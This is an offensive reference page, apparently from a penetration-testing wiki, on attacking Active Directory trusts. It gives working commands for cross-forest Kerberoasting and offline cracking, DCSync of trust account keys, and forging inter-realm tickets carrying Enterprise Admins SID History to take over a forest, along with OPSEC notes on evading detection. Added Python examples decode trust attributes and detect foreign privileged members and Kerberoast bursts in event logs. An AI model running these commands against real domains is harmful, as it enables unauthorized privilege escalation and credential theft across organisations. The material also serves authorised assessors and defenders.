Trusts and Cross-Forest Attacks
#Overview
Active Directory trusts allow principals from one domain or forest to access resources in another. Trust relationships create cross-boundary attack paths that can extend a compromise from a single domain to the entire forest or across forest boundaries. Understanding trust types, their direction, and the security controls in place (SID filtering, selective authentication, TGT delegation across trusts) is essential for determining whether and how a trust can be exploited.
#Prerequisites
- Credentials valid in the source domain (any privilege level)
- Network connectivity to Domain Controllers in both source and target domains
- Trust relationship between the domains (enumerate first)
- For cross-forest attacks: ability to resolve DNS across forest boundaries
#Detection & Enumeration
#Trust Discovery
# Windows — netdom (native tool)
netdom query trust
# Lists all trusts with direction and type
# PowerShell — Get-ADTrust
Get-ADTrust -Filter * | Format-List Name, Direction, TrustType, TrustAttributes, IntraForest, ForestTransitive, SIDFilteringQuarantined, SIDFilteringForestAware, SelectiveAuthentication, TGTDelegation
# Direction, type, and the SID filtering / selective authentication / TGT delegation state of each trust
# Windows — nltest
nltest /domain_trusts
# Quick trust enumeration
# Impacket — lookupsid across trust
# Works when the target domain trusts the source domain (Inbound or Bidirectional as seen from the source)
lookupsid.py <source_domain>/<user>:<pass>@<target_dc>
# Brute-forces RIDs over LSARPC and prints the target domain SID, which the SID History attacks below need
# BloodHound
# Trusts are shown as edges between domain nodes
# Edge label includes trust type and direction
# Query: "Find all Trusts"
#Identifying Trust Types
# Trust type from Get-ADTrust output (trustType attribute):
# TrustType: 1 = Downlevel (NT4), 2 = Uplevel (AD), 3 = MIT realm, 4 = DCE
#   Forest and external trusts are both Uplevel; the difference lives in TrustAttributes
# TrustDirection: 0 = Disabled, 1 = Inbound, 2 = Outbound, 3 = Bidirectional
#   Relative to the domain you query from: Inbound = the other domain trusts this one (your principals
#   can authenticate there); Outbound = this domain trusts the other (their principals can authenticate here)
# TrustAttributes bit flags: 0x1 NON_TRANSITIVE, 0x4 QUARANTINED_DOMAIN (SID filtering on an external trust),
#   0x8 FOREST_TRANSITIVE (forest trust), 0x10 CROSS_ORGANIZATION (selective authentication),
#   0x20 WITHIN_FOREST (parent-child / tree-root), 0x40 TREAT_AS_EXTERNAL (SID History honored across a forest trust),
#   0x200 / 0x800 = TGT delegation across the trust disabled / enabled
# Forest trusts (the forest flag is in TrustAttributes, not TrustType)
Get-ADTrust -Filter * | Where-Object { $_.ForestTransitive } | Format-List *
# Intra-forest (parent-child / tree-root) trusts
Get-ADTrust -Filter * | Where-Object { $_.IntraForest } | Format-List *
#Trust Types and Implications
| Trust Type | Description | Attack Implications |
|---|---|---|
| Parent-Child | Automatic, transitive, bidirectional trust between a parent and a child domain in the same forest | SID filtering not applied: a ticket forged with the trust key carrying Enterprise Admins (forest root SID + RID 519) in SID History is honored, so one compromised domain is a compromised forest. |
| Tree-Root | Automatic trust between the forest root and the root of another tree in the same forest | Same as parent-child. |
| Forest | Transitive trust between the root domains of two separate forests | SID filtering on by default; SID History honored only with TREAT_AS_EXTERNAL (netdom /enablesidhistory:Yes), and even then RIDs < 1000 are dropped. Selective authentication optional. TGT delegation across the trust blocked by default since the 2019 updates. |
| External | Non-transitive trust between two domains in different forests (or to an NT4 domain) | SID filtering (quarantine) on by default; can be disabled with netdom /quarantine:No. Kerberos and NTLM work only between the two directly linked domains. |
| Realm (MIT) | Trust to a non-Windows Kerberos realm (MIT, Heimdal) | Tickets from the realm carry no PAC; Windows-side access depends on account name mapping. Rarely an escalation path. |
#Exploitation / Execution
#SID Filtering Analysis
SID Filtering strips SIDs from a cross-trust ticket's PAC (SID History included) that do not belong to the trusted domain (or, on a forest trust, to the trusted forest's domains), so a principal in the trusted domain cannot present a forged SID such as Enterprise Admins (RID 519) to the trusting domain. It is applied by default on forest and external trusts and not applied on intra-forest (parent-child / tree-root) trusts, which is why one compromised child domain yields the whole forest.
# Check SID filtering state
Get-ADTrust -Filter * | Select-Object Name, Direction, TrustAttributes, SIDFilteringQuarantined, SIDFilteringForestAware
# External trust: TrustAttributes & 0x4 (TRUST_ATTRIBUTE_QUARANTINED_DOMAIN) = SID filtering ENABLED (the default)
#   Flag absent (netdom /quarantine:No was run) = SID History injection works across the trust
# Forest trust: filtered by default regardless of 0x4. TrustAttributes & 0x40 (TREAT_AS_EXTERNAL, netdom /enablesidhistory:Yes)
#   honors SID History, but SIDs with RID < 1000 are still dropped: only custom groups (RID >= 1000) that were
#   granted rights in the target can be injected, never Domain Admins or Enterprise Admins
# netdom: show the current setting (append :Yes or :No to change it, as an admin of the trusting domain)
netdom trust <trusting_domain> /domain:<trusted_domain> /quarantine
netdom trust <trusting_domain> /domain:<trusted_domain> /enablesidhistory
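The decoding described under Identifying Trust Types and the SID filtering rules above, as an added Python example (not code from the original page): it takes the raw trustType, trustDirection and trustAttributes integers a TDO exposes through LDAP or Get-ADTrust, names the set bits using the MS-ADTS flag values, and derives the four things that decide an attack path: trust kind, whether your principals can authenticate across it, whether SID filtering will drop a forged SID History, and whether selective authentication or TGT delegation restrictions apply. The trusts in SAMPLE_TRUSTS and their names are constructed.

```python
"""Decode trustedDomain attributes and derive the controls that decide whether a
trust is exploitable. Added example, not code from the original page: the bit
values are the MS-ADTS trustAttributes flags exactly as Get-ADTrust / LDAP return
them; the trusts in SAMPLE_TRUSTS are constructed and their names hypothetical.
"""

TRUST_TYPE = {1: "Downlevel (NT4)", 2: "Uplevel (AD)", 3: "MIT realm", 4: "DCE"}
TRUST_DIRECTION = {0: "Disabled", 1: "Inbound", 2: "Outbound", 3: "Bidirectional"}

FLAGS = {  # trustAttributes bits (MS-ADTS 6.1.6.7.9)
    "NON_TRANSITIVE": 0x1,
    "UPLEVEL_ONLY": 0x2,
    "QUARANTINED_DOMAIN": 0x4,   # SID filtering on an external trust (netdom /quarantine:Yes)
    "FOREST_TRANSITIVE": 0x8,    # forest trust
    "CROSS_ORGANIZATION": 0x10,  # selective authentication
    "WITHIN_FOREST": 0x20,       # parent-child or tree-root trust
    "TREAT_AS_EXTERNAL": 0x40,   # forest trust honouring SID history (netdom /enablesidhistory:Yes)
    "USES_RC4_ENCRYPTION": 0x80,
    "CROSS_ORGANIZATION_NO_TGT_DELEGATION": 0x200,      # netdom /enabletgtdelegation:No
    "PIM_TRUST": 0x400,
    "CROSS_ORGANIZATION_ENABLE_TGT_DELEGATION": 0x800,  # netdom /enabletgtdelegation:Yes
}

# Constructed TDOs as seen from the domain we hold credentials in (hypothetical names)
SAMPLE_TRUSTS = [
    {"name": "child.corp.local", "trustType": 2, "trustDirection": 3, "trustAttributes": 0x20},
    {"name": "partner.example", "trustType": 2, "trustDirection": 3, "trustAttributes": 0x8},
    {"name": "legacy.example", "trustType": 2, "trustDirection": 1, "trustAttributes": 0x4},
    {"name": "lab.example", "trustType": 2, "trustDirection": 1, "trustAttributes": 0x8 | 0x10 | 0x40},
    {"name": "vendor.example", "trustType": 2, "trustDirection": 2, "trustAttributes": 0x0},
]


def has(attrs, flag):
    return bool(attrs & FLAGS[flag])


def decode_attributes(attrs):
    """Names of the set trustAttributes bits, lowest bit first."""
    return [name for name, bit in sorted(FLAGS.items(), key=lambda kv: kv[1]) if attrs & bit]


def analyze_trust(trust):
    """Classify one trust from the perspective of the domain that holds the TDO."""
    attrs, direction = trust["trustAttributes"], trust["trustDirection"]

    if has(attrs, "WITHIN_FOREST"):
        kind, sid_filtering = "intra-forest", "not applied"
    elif has(attrs, "FOREST_TRANSITIVE"):
        kind = "forest"
        # Forest trusts filter by default; TREAT_AS_EXTERNAL honours SID history,
        # but SIDs with RID < 1000 (Enterprise Admins = 519) are still dropped.
        sid_filtering = "relaxed (RID >= 1000 only)" if has(attrs, "TREAT_AS_EXTERNAL") else "applied"
    elif trust["trustType"] == 3:
        kind, sid_filtering = "realm", "n/a"
    else:
        kind = "external"
        sid_filtering = "applied" if has(attrs, "QUARANTINED_DOMAIN") else "disabled"

    if kind == "intra-forest":
        tgt_delegation = "unrestricted"
    elif has(attrs, "CROSS_ORGANIZATION_ENABLE_TGT_DELEGATION"):
        tgt_delegation = "enabled"
    else:
        tgt_delegation = "disabled"  # explicit 0x200, or the post-2019 default

    # trustDirection is relative to the TDO's own domain: Inbound = the other domain
    # trusts us (our principals authenticate there), Outbound = we trust them.
    we_authenticate_there = direction in (1, 3)
    they_authenticate_here = direction in (2, 3)

    return {
        "name": trust["name"],
        "type": TRUST_TYPE.get(trust["trustType"], "unknown"),
        "direction": TRUST_DIRECTION.get(direction, "unknown"),
        "kind": kind,
        "flags": decode_attributes(attrs),
        "transitive": kind in ("intra-forest", "forest") and not has(attrs, "NON_TRANSITIVE"),
        "sid_filtering": sid_filtering,
        "selective_auth": has(attrs, "CROSS_ORGANIZATION"),
        "tgt_delegation": tgt_delegation,
        "we_authenticate_there": we_authenticate_there,
        "they_authenticate_here": they_authenticate_here,
        # A forged SID history pays off only if we can reach their KDC and it keeps the SIDs.
        "sid_history_escalation": we_authenticate_there and sid_filtering in ("not applied", "disabled"),
    }


def triage(trusts=SAMPLE_TRUSTS):
    """Analyze every trust and key the results by name."""
    return {t["name"]: analyze_trust(t) for t in trusts}


if __name__ == "__main__":
    for name, r in triage().items():
        print(f"{name:18} {r['kind']:12} {r['direction']:13} filtering={r['sid_filtering']:26} "
              f"selective={str(r['selective_auth']):5} sid_history_escalation={r['sid_history_escalation']}")
```

Feed it the integers from `Get-ADTrust -Filter * | Select-Object Name, TrustType, TrustDirection, TrustAttributes` (or the raw LDAP attributes). The vendor.example record shows the direction trap: quarantine is off, so SID History would be honored, but the trust is Outbound from our side, so the escalation runs toward us, not away from us.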
#Cross-Forest Kerberoasting
If the target domain trusts the source domain, a source-domain principal can obtain service tickets for SPN-bearing accounts in the target domain: the source KDC issues a referral TGT, the target KDC issues the service ticket encrypted with the service account's key, and that ticket is cracked offline like any other Kerberoast hash.
# Impacket: authenticate as a source-domain user, enumerate and request SPNs in the target domain
# -dc-ip is the SOURCE domain's DC (the TGT and the referral come from there); the target domain FQDN must resolve via DNS
GetUserSPNs.py -target-domain <target_domain_fqdn> -dc-ip <source_dc_ip> \
    -request -outputfile <hash_file> <source_domain>/<source_user>:<pass>
# Omit :<pass> to be prompted for the source domain password
# Crack the TGS hashes ($krb5tgs$23$ = RC4, mode 13100; $krb5tgs$18$ = AES256, mode 19700)
hashcat -m 13100 <hash_file> /usr/share/wordlists/rockyou.txt
#Foreign ACL Principals Abuse
Once a trust exists, principals from the trusted domain can be granted rights in the trusting domain: membership in its domain local groups (a global group such as Domain Admins cannot hold foreign members; universal groups can, but only from the same forest) or ACEs on its objects. Each grant is recorded as a foreign security principal under CN=ForeignSecurityPrincipals and is a cross-domain escalation path that needs no forged ticket.
# BloodHound: foreign principals appear as nodes from the other domain with MemberOf / ACL edges into this one
# List foreign security principals in the target domain and the groups they sit in
Get-ADObject -Filter { objectClass -eq "foreignSecurityPrincipal" } -Properties memberOf | Select-Object Name, memberOf
# Members of the privileged domain local groups; SIDs whose domain prefix is not the target's own come from across a trust
Get-ADGroup -Identity Administrators -Properties member | Select-Object -ExpandProperty member
(Get-ADDomain).DomainSID
# If a source-domain principal (or a group containing it) is listed, authenticate from the source domain to the target's resources
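The triage the section above describes, as an added Python example (not from the original page): given (group SID, member SID) pairs as read from each group's member attribute, it splits every account SID into its domain prefix and RID, flags members whose prefix is not the local domain SID, and notes when the foreign member is itself a well-known group (RID below 1000, such as the other domain's Domain Admins), since then every member of that foreign group inherits the privilege. OUR_DOMAIN_SID, FOREIGN_DOMAIN_SID and the membership list are constructed; the builtin group SIDs are the real well-known values.

```python
"""Flag principals from another domain that sit in privileged groups of this
one. Added example, not from the page: OUR_DOMAIN_SID, FOREIGN_DOMAIN_SID and
SAMPLE_MEMBERSHIP are constructed and hypothetical; the builtin group SIDs are
the real well-known values.
"""
import re

ACCOUNT_SID = re.compile(r"^(S-1-5-21-\d+-\d+-\d+)-(\d+)$")

# Privileged builtin groups. They are domain local, which is the only scope that
# can hold principals from another forest; Domain Admins (global) cannot.
PRIVILEGED_GROUPS = {
    "S-1-5-32-544": "Administrators",
    "S-1-5-32-548": "Account Operators",
    "S-1-5-32-549": "Server Operators",
    "S-1-5-32-551": "Backup Operators",
}

OUR_DOMAIN_SID = "S-1-5-21-1111111111-2222222222-3333333333"      # hypothetical
FOREIGN_DOMAIN_SID = "S-1-5-21-4444444444-5555555555-6666666666"  # hypothetical trusted domain

# Constructed (group SID, member SID) pairs, as if each group's member attribute
# had been resolved through CN=ForeignSecurityPrincipals.
SAMPLE_MEMBERSHIP = [
    ("S-1-5-32-544", OUR_DOMAIN_SID + "-512"),        # our own Domain Admins, expected
    ("S-1-5-32-544", FOREIGN_DOMAIN_SID + "-1105"),   # one user from the trusted domain
    ("S-1-5-32-551", FOREIGN_DOMAIN_SID + "-512"),    # the trusted domain's entire Domain Admins group
    ("S-1-5-32-548", OUR_DOMAIN_SID + "-1203"),       # local user, not foreign
    (OUR_DOMAIN_SID + "-513", FOREIGN_DOMAIN_SID + "-1106"),  # foreign, but in a non-privileged group
]


def split_sid(sid):
    """Return (domain SID, RID) for an account SID, or (None, None) for anything else."""
    m = ACCOUNT_SID.match(sid)
    return (m.group(1), int(m.group(2))) if m else (None, None)


def foreign_privileged_members(membership, our_domain_sid=OUR_DOMAIN_SID):
    """Members of privileged groups whose SID belongs to another domain."""
    findings = []
    for group_sid, member_sid in membership:
        if group_sid not in PRIVILEGED_GROUPS:
            continue
        domain_sid, rid = split_sid(member_sid)
        if domain_sid is None or domain_sid == our_domain_sid:
            continue
        findings.append({
            "group": PRIVILEGED_GROUPS[group_sid],
            "member": member_sid,
            "foreign_domain": domain_sid,
            # RID < 1000 is a well-known principal (512 = that domain's Domain Admins):
            # everyone in the foreign group inherits the privilege here.
            "group_grant": rid < 1000,
        })
    return findings


def foreign_domains_with_privilege(membership, our_domain_sid=OUR_DOMAIN_SID):
    """Domain SIDs that hold privilege here; each should correspond to a configured trust."""
    return sorted({f["foreign_domain"] for f in foreign_privileged_members(membership, our_domain_sid)})


if __name__ == "__main__":
    for f in foreign_privileged_members(SAMPLE_MEMBERSHIP):
        print(f"{f['group']:18} <- {f['member']} (whole foreign group: {f['group_grant']})")
```

Compare the domain SIDs it reports against the trust list: a foreign domain SID with privilege here but no matching trust points at a stale foreign security principal left over from a removed trust.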
#Trust Key Attacks
Both sides of a trust hold the shared inter-realm key: in the trustedDomain object (trustAuthIncoming / trustAuthOutgoing) and as the password of an inter-domain trust account named <OTHER_DOMAIN>$. With that key you can forge the referral TGT (krbtgt/<target_domain>) that the target KDC accepts as if its partner KDC had issued it, and on an intra-forest trust you can add Enterprise Admins to its SID History. The key rotates every 30 days, so dump it shortly before use.
# DCSync the trust account from the domain you already control (needs replication rights there)
# In a bidirectional trust each domain holds an account named after the other: <TARGET_DOMAIN>$ in the source domain
impacket-secretsdump <source_domain>/<da_user>@<source_dc> -just-dc-user '<TARGET_DOMAIN>$'
# The NT hash of <TARGET_DOMAIN>$ is the trust key
# Forge the inter-realm TGT: -spn krbtgt/<target_domain> makes ticketer encrypt with the trust key instead of the source krbtgt key
impacket-ticketer -nthash <trust_hash> -domain-sid <source_domain_sid> -domain <source_domain> \
    -spn krbtgt/<target_domain_fqdn> -extra-sid <target_domain_sid>-519 Administrator
# -extra-sid puts Enterprise Admins (RID 519; exists only in the forest root, so target = root domain) in SID History
#   Honored on intra-forest trusts only; SID filtering drops it on forest and external trusts
# Present the forged referral TGT to the target KDC for a service ticket
export KRB5CCNAME=Administrator.ccache
impacket-getST -k -no-pass -spn cifs/<target_dc_fqdn> -dc-ip <target_dc> <target_domain>/Administrator
# Impacket's raiseChild.py automates the same child-to-parent escalation using the child krbtgt key instead
#Kerberos across Trusts
# Request a TGT in the source domain
getTGT.py -dc-ip <source_dc> <source_domain>/<user>:<pass>
export KRB5CCNAME=<user>.ccache
# Step 1: ask the SOURCE KDC for a referral TGT for the target domain (krbtgt/<target_domain>)
# Referrals are issued over intra-forest trusts and over forest/external trusts where the target trusts the source
getST.py -spn krbtgt/<target_domain_fqdn> -dc-ip <source_dc> -k -no-pass <source_domain>/<user>
# Step 2: present the referral TGT to the TARGET KDC for a service ticket (getST prints the ccache it saved)
export KRB5CCNAME=<referral_ccache>
getST.py -spn cifs/<target_dc>.<target_domain> -dc-ip <target_dc> -k -no-pass <target_domain>/<user>
# A single request with -dc-ip pointing at the target DC fails: that KDC cannot decrypt a source-domain TGT
# With selective authentication (TrustAttributes 0x10) the target KDC refuses the service ticket unless the principal
#   holds "Allowed to Authenticate" on that computer object; fall back to cross-forest Kerberoasting or foreign ACL abuse
#Common Pitfalls
- SID filtering blocks escalation: SID History injection is dropped on forest trusts and on external trusts with quarantine set. Check TrustAttributes (0x4 / 0x40) before forging tickets.
- DNS resolution: cross-forest attacks need the target domain's names to resolve (KDC discovery via SRV records, referral targets). Point your resolver at a DC that hosts the zone, or add the target DC to /etc/hosts.
- Selective authentication: forest trusts with selective auth (TrustAttributes 0x10) require an explicit "Allowed to Authenticate" ACE on each target computer object; without it the target KDC refuses service tickets.
- One-way trust direction: authentication flows only one way. From the domain you hold credentials in, the trust must be Inbound or Bidirectional for your principals to reach the other side.
- TGT delegation: unconstrained-delegation abuse across a forest or external trust requires netdom /enabletgtdelegation:Yes on the trust; since the 2019 updates it is blocked by default (TrustAttributes 0x800 enables, 0x200 disables).
#OPSEC Considerations
- Cross-domain Kerberos requests generate events in both the source and target domain's DC logs
- Foreign ACL modifications are logged as AD object changes
- Trust account credential dumping (DCSync on trust account) generates the same 4662 events as regular DCSync
- Cross-forest Kerberoasting generates 4769 events on the target KDC with the requesting account in a foreign realm; a burst of RC4 (0x17) tickets for many distinct SPNs from one account is the signature
- SID History injection leaves traces in PAC validation and can be flagged by ATA/MDI
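The two 4769-based signals above (a principal crossing a trust, and a cross-forest Kerberoast burst), as an added Python example that is not part of the original page: it parses a constructed set of 4769 events written in a flattened one-line key=value layout (assumed for the example, not the Windows event schema), reports every referral TGT issued toward another realm, and flags any account that pulled several distinct RC4 service tickets inside a short window, marking it as foreign when the account's realm is not the local one. CORP.LOCAL, PARTNER.EXAMPLE, the hosts, accounts and addresses are hypothetical.

```python
"""Two trust-related checks over 4769 (Kerberos service ticket request) events.
Added example, not from the page: the events are constructed in a flattened
key=value layout (one per line, assumed for the example), and CORP.LOCAL,
PARTNER.EXAMPLE, the hosts and addresses are hypothetical.
Check 1: a referral TGT (ServiceName krbtgt/<other realm>) marks a principal
crossing a trust. Check 2: a burst of RC4 (0x17) service tickets for distinct
SPNs from one account is the Kerberoast signature; a foreign realm on the
account makes it the cross-forest variant.
"""
from collections import defaultdict
from datetime import datetime, timedelta

SAMPLE_4769 = """\
2024-05-03T10:00:01 EventID=4769 AccountName=jdoe@CORP.LOCAL ServiceName=cifs/fs01.corp.local TicketEncryptionType=0x12 IpAddress=10.0.0.15
2024-05-03T10:00:02 EventID=4769 AccountName=jdoe@CORP.LOCAL ServiceName=krbtgt/PARTNER.EXAMPLE TicketEncryptionType=0x12 IpAddress=10.0.0.15
2024-05-03T10:05:10 EventID=4769 AccountName=svc_scan@PARTNER.EXAMPLE ServiceName=MSSQLSvc/db01.corp.local:1433 TicketEncryptionType=0x17 IpAddress=10.9.9.9
2024-05-03T10:05:11 EventID=4769 AccountName=svc_scan@PARTNER.EXAMPLE ServiceName=HTTP/web01.corp.local TicketEncryptionType=0x17 IpAddress=10.9.9.9
2024-05-03T10:05:11 EventID=4769 AccountName=svc_scan@PARTNER.EXAMPLE ServiceName=MSSQLSvc/db02.corp.local:1433 TicketEncryptionType=0x17 IpAddress=10.9.9.9
2024-05-03T10:05:12 EventID=4769 AccountName=svc_scan@PARTNER.EXAMPLE ServiceName=HTTP/rep01.corp.local TicketEncryptionType=0x17 IpAddress=10.9.9.9
2024-05-03T10:05:13 EventID=4769 AccountName=svc_scan@PARTNER.EXAMPLE ServiceName=ldap/app01.corp.local TicketEncryptionType=0x17 IpAddress=10.9.9.9
2024-05-03T11:30:00 EventID=4769 AccountName=backup@CORP.LOCAL ServiceName=cifs/fs02.corp.local TicketEncryptionType=0x17 IpAddress=10.0.0.40
"""


def parse_events(text):
    """Turn the flattened lines into dicts with a parsed timestamp, account and realm."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, *fields = line.split()
        ev = dict(f.split("=", 1) for f in fields)
        ev["time"] = datetime.fromisoformat(ts)
        ev["account"], _, ev["realm"] = ev["AccountName"].rpartition("@")
        events.append(ev)
    return events


def cross_realm_referrals(events, local_realm):
    """(account, target realm) for every referral TGT issued toward another realm."""
    hits = []
    for ev in events:
        service, _, realm = ev["ServiceName"].partition("/")
        if service.lower() == "krbtgt" and realm.upper() != local_realm.upper():
            hits.append((ev["account"], realm))
    return hits


def kerberoast_bursts(events, local_realm, window=timedelta(minutes=5), threshold=4):
    """Accounts that pulled >= threshold distinct RC4 service tickets inside one window."""
    by_account = defaultdict(list)
    for ev in events:
        if ev.get("TicketEncryptionType", "").lower() != "0x17":
            continue
        if ev["ServiceName"].lower().startswith("krbtgt/"):
            continue  # referral TGTs are not roastable service tickets
        by_account[ev["AccountName"]].append(ev)

    findings = []
    for account, evs in by_account.items():
        evs.sort(key=lambda e: e["time"])
        for i, first in enumerate(evs):
            in_window = [e for e in evs[i:] if e["time"] - first["time"] <= window]
            spns = {e["ServiceName"].lower() for e in in_window}
            if len(spns) >= threshold:
                findings.append({
                    "account": account,
                    "distinct_spns": len(spns),
                    "foreign": first["realm"].upper() != local_realm.upper(),
                    "source_ip": first["IpAddress"],
                })
                break  # one finding per account is enough
    return findings


def run_checks(text=SAMPLE_4769, local_realm="CORP.LOCAL"):
    events = parse_events(text)
    return {
        "referrals": cross_realm_referrals(events, local_realm),
        "kerberoast": kerberoast_bursts(events, local_realm),
    }


if __name__ == "__main__":
    for key, value in run_checks().items():
        print(key, value)
```

The RC4 filter is what keeps the false-positive rate workable: modern clients request AES (0x12) tickets, so an account asking for many 0x17 tickets in seconds is either a roasting tool or a legacy host worth explaining. Tune `threshold` and `window` to the environment before alerting on it.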
#Post-Exploitation Value
- Extends domain compromise to entire forest (intra-forest trusts)
- Extends compromise across forest boundaries (forest trusts without SID filtering)
- Access to resources, data, and credentials in the target domain/forest
- Ability to establish persistence across domain/forest boundaries via foreign group membership
#Cross-References
#Tool References
| Tool | Link |
|---|---|
| Impacket (GetUserSPNs, ticketer, secretsdump) | https://github.com/fortra/impacket |
| netdom (Windows) | Built-in Windows tool |
| Get-ADTrust (PowerShell) | ActiveDirectory module |
| BloodHound | https://github.com/BloodHoundAD/BloodHound |
#Source Machines
- (Conceptual — cross-forest trust exploitation patterns documented from real AD security assessments)